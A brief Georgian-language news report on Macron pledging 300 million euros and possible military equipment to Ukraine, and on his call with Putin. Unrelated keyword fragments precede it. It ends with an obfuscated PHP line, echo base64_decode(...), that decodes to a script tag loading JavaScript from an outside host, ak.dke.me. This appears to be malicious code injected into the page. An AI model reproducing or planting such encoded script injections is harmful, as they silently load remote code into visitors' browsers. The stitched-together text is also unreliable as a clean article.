celsiusi
ავერსი საქკაბელი
საფრანგეთის პრეზიდენტი ემანუელ მაკრონი აცხადებს, რომ ევროკავშირის მაკროფინანსური დახმარების გარდა, საფრანგეთი უკრაინის ეკონომიკის მხარდასაჭერად, თავის მხრივ, 300 მილიონ ევროს გამოუყოფს. ამასთან, ემანუელ მაკრონი მზადყოფნას გამოთქვამს, მიაწოდოს უკრაინას სამხედრო აღჭურვილობა. ამის შესახებ მაკრონმა ევროკავშირის სამიტის დასრულების შემდეგ განაცხადა.
 
ემანუელ მაკრონის თქმით, მას პრეზიდენტ ზელენსკის თხოვნით ჰქონდა გულწრფელი და პირდაპირი საუბარი პრეზიდენტ პუტინთან, თუმცა ამან სასურველი შედეგი არ გამოიღო, რადგან მაკრონის თქმით, რუსეთის პრეზიდენტმა „ომი აირჩია“.
 
„მე მქონდა გულწრფელი, პირდაპირი, სწრაფი საუბარი პრეზიდენტ პუტინთან პრეზიდენტ ზელენსკის თხოვნით, რათა მეთხოვა მისთვის, შეეწყვიტა საბრძოლო მოქმედებები რაც შეიძლება მალე და შემეთავაზებინა მისთვის, მოლაპარაკებები გაემართა პრეზიდენტ ზელენსკისთან, რომლის თხოვნაც იყო ეს. მან მასთან დაკავშირება ვერ ვერ შეძლო. ასე რომ, მე გადავეცი ეს გზავნილი საფრანგეთისგან რუსეთის ფედერაციას მკაფიოდ და ასევე გადავეცი მას გზავნილი უკრაინის პრეზიდენტისგან. ამას რამე შედეგი არ გამოუღია, თქვენ შეგიძლიათ, ეს ცხადად დაინახოთ ამ მომენტისთვის, რადგან რუსეთის პრეზიდენტმა აირჩია ომი“, – განაცხადა მაკრონმა.
 
 
 
822
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");